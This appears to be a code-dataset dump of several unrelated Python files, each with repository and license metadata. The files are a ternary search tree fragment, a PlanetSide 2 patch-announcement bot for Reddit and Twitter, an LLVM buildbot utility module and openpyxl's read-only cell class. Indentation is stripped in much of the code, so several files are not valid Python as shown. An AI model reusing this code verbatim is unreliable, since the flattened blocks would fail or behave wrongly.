if(estMotActuel is not False):
estMot = estMotActuel
            #Extend the list of nodes from which to continue the search (with mot as the prefix)
suivants += suivant
return estMot, suivants
def rechercherMot(self, noeudA, mot):
estMotM = False
estMotD = False
suivantM = []
suivantD = []
        #If the node exists
if(noeudA):
lettre = noeudA.lettre
estMot = noeudA.estMot
fmA = noeudA.fm
fdA = noeudA.fd
            #If the node matches the current letter (or it is a wildcard)
if (mot[0] == '.' or mot[0] == lettre):
                #We found the node corresponding to the word
if(len(mot) == 1):
                    #This node has a child, keep it to start a later search from it
if(fmA):
suivantM.append(fmA)
                    #The path travelled corresponds to a dictionary word
if(estMot):
estMotM = noeudA
                #Continue searching the word with the next letter if we are not at the end
else:
if(fmA):
estMotM, suivantM = self.rechercherMot(fmA, mot[1:])
            #If the node does not match the current letter (or it is a wildcard), continue the search to the right
if (mot[0] == '.' or mot[0] > lettre):
if(fdA):
estMotD, suivantD = self.rechercherMot(fdA, mot)
        #Merge the two node lists (only useful when mot[0] is a wildcard)
suivant = suivantM + suivantD
        #If a word was found to the right or in the middle (or both), keep the node corresponding to that word
if(estMotM):
estMot = estMotM
elif(estMotD):
estMot = estMotD
else:
estMot = False
return estMot, suivant
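#Example usage (illustrative only): build a small dictionary file, load it into
#the tree and search it, including a '.' wildcard. The word list is made up.
if __name__ == '__main__':
    import tempfile
    dossier = tempfile.mkdtemp()
    chemin = os.path.join(dossier, 'dico.txt')
    with open(chemin, 'w') as f:
        f.write('char\nchat\nchats\n')
    arbre = Arbre(chemin)
    mot, suivants = arbre.rechercher('chat')
    print(mot.motComplet if mot else None)   # 'chat'
    mot, suivants = arbre.rechercher('cha.')
    print(mot.motComplet if mot else None)   # one of the words matching 'cha.'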
| cc0-1.0 | 6,933,392,178,072,535,000 | 23.625984 | 129 | 0.667306 | false |
plasticantifork/PS2Updates | PS2Updates.py | 1 | 11589 | #!/usr/bin/python
import sys, os
import traceback
import requests
import hashlib
import tweepy
import praw, oauthPS2Bot
from lxml import etree
from datetime import datetime,timedelta
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return '%3.1f %s%s' % (num, unit, suffix)
num /= 1024.0
return '%.1f %s%s' % (num, 'Yi', suffix)
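# Worked example (illustrative): sizeof_fmt(123456789) returns '117.7 MiB',
# the format used for the "Size:" line in the reddit post body below.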
def Monitor():
with open(os.path.join(sys.path[0], 'siteList.txt'), 'r') as f:
for line in f:
timeZone = datetime.utcnow() - timedelta(hours=7)
updateTime = timeZone.strftime('%Y-%m-%d %I:%M %p') + ' PST'
Message = line.split(',')[0]
hashTags = line.split(',')[2]
url = line.split(',')[1]
urlCommon = line.split(',')[3]
urlCommon = urlCommon.rstrip()
fileName = 'tstamps/%s' % Message
fileNameCommon = 'tstamps/C-%s' % Message
try:
tstampFileCommon = open(os.path.join(sys.path[0], fileNameCommon), 'r')
except:
resp = requests.head(urlCommon)
websiteTstampCommon = resp.headers['Last-Modified']
tstampFileCommon = open(os.path.join(sys.path[0], fileNameCommon), 'w')
tstampFileCommon.write(websiteTstampCommon)
tstampFileCommon.close()
print 'Creating common tstamp file: %s' % Message
try:
tstampFile = open(os.path.join(sys.path[0], fileName), 'r')
except:
resp = requests.head(url)
websiteTstamp = resp.headers['Last-Modified']
tstampFile = open(os.path.join(sys.path[0], fileName), 'w')
tstampFile.write(websiteTstamp)
tstampFile.close()
print 'Creating tstamp file: %s' % Message
else:
resp = requests.head(url)
websiteTstamp = resp.headers['Last-Modified']
tstampFile = open(os.path.join(sys.path[0], fileName), 'r')
oldWebsiteTstamp = tstampFile.readline().strip()
tstampFile.close()
tstampFile = open(os.path.join(sys.path[0], fileName), 'w')
tstampFile.write(websiteTstamp)
tstampFile.close()
#oldWebsiteTstamp = 'sdfsdf'
resp = requests.head(urlCommon)
websiteTstampCommon = resp.headers['Last-Modified']
tstampFileCommon = open(os.path.join(sys.path[0], fileNameCommon), 'r')
oldWebsiteTstampCommon = tstampFileCommon.readline().strip()
tstampFileCommon.close()
tstampFileCommon = open(os.path.join(sys.path[0], fileNameCommon), 'w')
tstampFileCommon.write(websiteTstampCommon)
tstampFileCommon.close()
#oldWebsiteTstampCommon = 'sdfsdf'
if(websiteTstamp != oldWebsiteTstamp) or (websiteTstampCommon != oldWebsiteTstampCommon):
patchSize = 0
redditFileNames = []
if ('Upcoming' not in Message) and ('PS2' in Message):
if (url == 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-live/live/planetside2-live.sha.soe.txt'):
newUrl = url
lastUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-live/livelast/planetside2-live.sha.soe.txt'
newCommonUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-livecommon/live/planetside2-livecommon.sha.soe.txt'
lastCommonUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-livecommon/livelast/planetside2-livecommon.sha.soe.txt'
elif (url == 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-test/live/planetside2-test.sha.soe.txt'):
newUrl = url
lastUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-test/livelast/planetside2-test.sha.soe.txt'
newCommonUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-testcommon/live/planetside2-testcommon.sha.soe.txt'
lastCommonUrl = 'http://manifest.patch.daybreakgames.com/patch/sha/manifest/planetside2/planetside2-testcommon/livelast/planetside2-testcommon.sha.soe.txt'
if(websiteTstamp != oldWebsiteTstamp):
newRoot = etree.parse(newUrl)
lastRoot = etree.parse(lastUrl)
for newFile in newRoot.iter('file'):
if (newFile.get('delete') != 'yes'):
lastFile = lastRoot.xpath(newRoot.getpath(newFile))
if isinstance(lastFile, list):
lastFile = lastFile[0]
if (newFile.get('timestamp')!=lastFile.get('timestamp')):
if (lastFile is None) or (not len(newFile)):
if (isinstance(newFile.get('compressedSize'), str)):
patchSize+=int(newFile.get('compressedSize'))
redditFileNames.append(newFile.get('name'))
else:
patchFound = False
for patch in newFile.iter():
if (not patchFound) and (patch.get('sourceTimestamp')==lastFile.get('timestamp')):
patchSize+=int(patch.get('patchCompressedSize'))
redditFileNames.append(newFile.get('name'))
patchFound = True
if not patchFound:
if (isinstance(newFile.get('compressedSize'), str)):
patchSize+=int(newFile.get('compressedSize'))
redditFileNames.append(newFile.get('name'))
if (websiteTstampCommon != oldWebsiteTstampCommon):
newRoot = etree.parse(newCommonUrl)
lastRoot = etree.parse(lastCommonUrl)
for newFile in newRoot.iter('file'):
if (newFile.get('delete') != 'yes'):
lastFile = lastRoot.xpath(newRoot.getpath(newFile))
if isinstance(lastFile, list):
lastFile = lastFile[0]
if (newFile.get('timestamp')!=lastFile.get('timestamp')):
if (lastFile is None) or (not len(newFile)):
if (isinstance(newFile.get('compressedSize'), str)):
patchSize+=int(newFile.get('compressedSize'))
redditFileNames.append(newFile.get('name'))
else:
patchFound = False
for patch in newFile.iter():
if (not patchFound) and (patch.get('sourceTimestamp')==lastFile.get('timestamp')):
patchSize+=int(patch.get('patchCompressedSize'))
redditFileNames.append(newFile.get('name'))
patchFound = True
if not patchFound:
if (isinstance(newFile.get('compressedSize'), str)):
patchSize+=int(newFile.get('compressedSize'))
redditFileNames.append(newFile.get('name'))
if ('Upcoming' not in Message) and ('PS2' in Message):
r = oauthPS2Bot.login()
redditMessage = ' '.join(Message.replace('@Planetside2', '').split())
redditPost = u'\u25B2 %s update detected at %s' % (redditMessage, updateTime)
print '%s|Posting to Reddit (%s)' % (updateTime, Message)
redditFileNames.sort()
counter = 0
firstAsset = ''
if any('.pack' in a for a in redditFileNames):
for n in redditFileNames[:]:
if (n.endswith('.pack')):
if (not firstAsset):
firstAsset = n
redditFileNames.remove(n)
counter += 1
assetCount = counter-1
if (counter > 1):
redditFileNames.append('%s (and %s more)' % (firstAsset, assetCount))
elif (counter == 1):
redditFileNames.append(firstAsset)
redditFileNames.sort()
redditBody = '##**Files Changed**\n\n* %s\n\n**Size:** %s (%s bytes)\n\n*via [@PS2Updates](https://twitter.com/ps2updates) ([source code](https://github.com/plasticantifork/PS2Updates))*' % ('\n* '.join(redditFileNames), sizeof_fmt(patchSize), '{0:,}'.format(patchSize))
r.submit('planetside', redditPost, text=redditBody)
if 'Upcoming' in Message:
twitterPost = u'\u27F3 %s update detected at %s %s' % (Message, updateTime, hashTags)
else:
twitterPost = u'\u25B2 %s update detected at %s %s' % (Message, updateTime, hashTags)
print '%s|Posting to Twitter (%s)' % (updateTime, Message)
twitterAuthFile = open(os.path.join(sys.path[0], 'twitterAuth'), 'r')
consumerKey = twitterAuthFile.readline().strip()
consumerSecret = twitterAuthFile.readline().strip()
accessToken = twitterAuthFile.readline().strip()
accessTokenSecret = twitterAuthFile.readline().strip()
twitterAuthFile.close()
auth = tweepy.OAuthHandler(consumerKey, consumerSecret)
auth.set_access_token(accessToken, accessTokenSecret)
api = tweepy.API(auth)
api.update_status(status=twitterPost)
try:
Monitor()
except requests.exceptions.HTTPError:
print 'HTTPError Occurred'
except requests.exceptions.ConnectionError:
print 'ConnectionError Occurred'
except Exception:
traceback.print_exc()
quit()
| mit | 4,373,061,998,730,321,400 | 64.106742 | 294 | 0.48641 | false |
llvm/llvm-zorg | zorg/buildbot/builders/annotated/util.py | 1 | 3453 | from __future__ import print_function
import errno
import os
import re
import shutil
import subprocess
import sys
def clean_dir(path):
"""
Removes directory at path (and all its subdirectories) if it exists,
and creates an empty directory in its place.
"""
try:
rmtree(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mkdirp(path)
def cmake_pjoin(*args):
"""
Join paths like safe_pjoin, but replace backslashes with forward
slashes on platforms where they are path separators. This prevents
CMake from choking when trying to decode what it thinks are escape
sequences in filenames.
"""
result = safe_pjoin(*args)
if os.sep == '\\':
return result.replace('\\', '/')
else:
return result
def report(msg):
sys.stderr.write(msg + '\n')
sys.stderr.flush()
def report_run_cmd(cmd, shell=False, *args, **kwargs):
"""
    Print a command, then execute it using subprocess.check_call.
"""
report('Running: %s' % ((cmd if shell else shquote_cmd(cmd)),))
sys.stderr.flush()
subprocess.check_call(cmd, shell=shell, *args, **kwargs)
def mkdirp(path):
"""Create directory path if it does not already exist."""
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def rmtree(path):
"""
Remove directory path and all its subdirectories. This differs from
shutil.rmtree() in that it tries to adjust permissions so that deletion
will succeed.
"""
# Some files will not be deletable, so we set permissions that allow
# deletion before we try deleting files.
for root, dirs, files in os.walk(path):
os.chmod(root, 0o755)
for f in files:
p = os.path.join(root, f)
os.chmod(p, 0o644)
os.unlink(p)
# At this point, we should have a tree of deletable directories.
shutil.rmtree(path)
def safe_pjoin(dirname, *args):
"""
Join path components with os.path.join, skipping the first component
if it is None.
"""
if dirname is None:
return os.path.join(*args)
else:
return os.path.join(dirname, *args)
def _shquote_impl(txt, escaped_chars, quoted_chars):
quoted = re.sub(escaped_chars, r'\\\1', txt)
if len(quoted) == len(txt) and not quoted_chars.search(txt):
return txt
else:
return '"' + quoted + '"'
_SHQUOTE_POSIX_ESCAPEDCHARS = re.compile(r'(["`$\\])')
_SHQUOTE_POSIX_QUOTEDCHARS = re.compile('[|&;<>()\' \t\n]')
def shquote_posix(txt):
"""Return txt, appropriately quoted for POSIX shells."""
return _shquote_impl(
txt, _SHQUOTE_POSIX_ESCAPEDCHARS, _SHQUOTE_POSIX_QUOTEDCHARS)
_SHQUOTE_WINDOWS_ESCAPEDCHARS = re.compile(r'(["\\])')
_SHQUOTE_WINDOWS_QUOTEDCHARS = re.compile('[ \t\n]')
def shquote_windows(txt):
"""Return txt, appropriately quoted for Windows's cmd.exe."""
return _shquote_impl(
txt.replace('%', '%%'),
_SHQUOTE_WINDOWS_ESCAPEDCHARS, _SHQUOTE_WINDOWS_QUOTEDCHARS)
def shquote(txt):
"""Return txt, appropriately quoted for use in a shell command."""
if os.name in set(('nt', 'os2', 'ce')):
return shquote_windows(txt)
else:
return shquote_posix(txt)
def shquote_cmd(cmd):
"""Convert a list of shell arguments to an appropriately quoted string."""
return ' '.join(map(shquote, cmd))
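if __name__ == '__main__':
    # Usage sketch (illustrative only): platform-appropriate quoting plus the
    # directory helpers, exercised on a throw-away temporary directory.
    import tempfile
    print(shquote_cmd(['echo', 'hello world', 'a"b', '$HOME']))
    scratch = os.path.join(tempfile.mkdtemp(), 'scratch')
    clean_dir(scratch)   # removes any old tree and recreates an empty directory
    rmtree(os.path.dirname(scratch))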
| apache-2.0 | -2,361,367,775,517,901,300 | 25.767442 | 78 | 0.631045 | false |
manuvarkey/cmbautomiser | cmbautomiser/openpyxl/cell/read_only.py | 1 | 3984 | from __future__ import absolute_import
# Copyright (c) 2010-2018 openpyxl
import re
from openpyxl.compat import unicode, long
from openpyxl.cell import Cell
from openpyxl.utils import get_column_letter
from openpyxl.utils.datetime import from_excel
from openpyxl.styles import is_date_format
from openpyxl.styles.numbers import BUILTIN_FORMATS
FLOAT_REGEX = re.compile(r"\.|[E-e]")
def _cast_number(value):
"Convert numbers as string to an int or float"
m = FLOAT_REGEX.search(value)
if m is not None:
return float(value)
return long(value)
class ReadOnlyCell(object):
__slots__ = ('parent', 'row', 'column', '_value', 'data_type', '_style_id')
def __init__(self, sheet, row, column, value, data_type='n', style_id=0):
self.parent = sheet
self._value = None
self.row = row
self.column = column
self.data_type = data_type
self.value = value
self._style_id = style_id
def __eq__(self, other):
for a in self.__slots__:
if getattr(self, a) != getattr(other, a):
return
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "<ReadOnlyCell {0!r}.{1}>".format(self.parent.title, self.coordinate)
@property
def shared_strings(self):
return self.parent.shared_strings
@property
def base_date(self):
return self.parent.base_date
@property
def coordinate(self):
column = get_column_letter(self.column)
return "{1}{0}".format(self.row, column)
@property
def style_array(self):
return self.parent.parent._cell_styles[self._style_id]
@property
def number_format(self):
_id = self.style_array.numFmtId
if _id < 164:
return BUILTIN_FORMATS.get(_id, "General")
else:
return self.parent.parent._number_formats[_id - 164]
@property
def font(self):
_id = self.style_array.fontId
return self.parent.parent._fonts[_id]
@property
def fill(self):
_id = self.style_array.fillId
return self.parent.parent._fills[_id]
@property
def border(self):
_id = self.style_array.borderId
return self.parent.parent._borders[_id]
@property
def alignment(self):
_id = self.style_array.alignmentId
return self.parent.parent._alignments[_id]
@property
def protection(self):
_id = self.style_array.protectionId
return self.parent.parent._protections[_id]
@property
def is_date(self):
return self.data_type == 'n' and is_date_format(self.number_format)
@property
def internal_value(self):
return self._value
@property
def value(self):
if self._value is None:
return
if self.data_type == 'n':
if self.style_array:
if is_date_format(self.number_format):
return from_excel(self._value, self.base_date)
return self._value
if self.data_type == 'b':
return self._value == '1'
elif self.data_type in(Cell.TYPE_INLINE, Cell.TYPE_FORMULA_CACHE_STRING):
return unicode(self._value)
elif self.data_type == 's':
return unicode(self.shared_strings[int(self._value)])
return self._value
@value.setter
def value(self, value):
if self._value is not None:
raise AttributeError("Cell is read only")
if value is None:
self.data_type = 'n'
elif self.data_type == 'n':
value = _cast_number(value)
self._value = value
class EmptyCell(object):
__slots__ = ()
value = None
is_date = False
font = None
border = None
fill = None
number_format = None
alignment = None
data_type = 'n'
def __repr__(self):
return "<EmptyCell>"
EMPTY_CELL = EmptyCell()
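if __name__ == '__main__':
    # Illustrative sketch: _cast_number() turns numeric strings into int/float
    # values, and EMPTY_CELL is the shared placeholder for missing cells.
    print(_cast_number('42'))     # 42 (integer)
    print(_cast_number('3.14'))   # 3.14 (float)
    print(_cast_number('1E3'))    # 1000.0 (scientific notation -> float)
    print(EMPTY_CELL.data_type)   # 'n'; EMPTY_CELL.value is None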
| gpl-3.0 | 7,798,107,740,639,183,000 | 24.703226 | 84 | 0.591616 | false |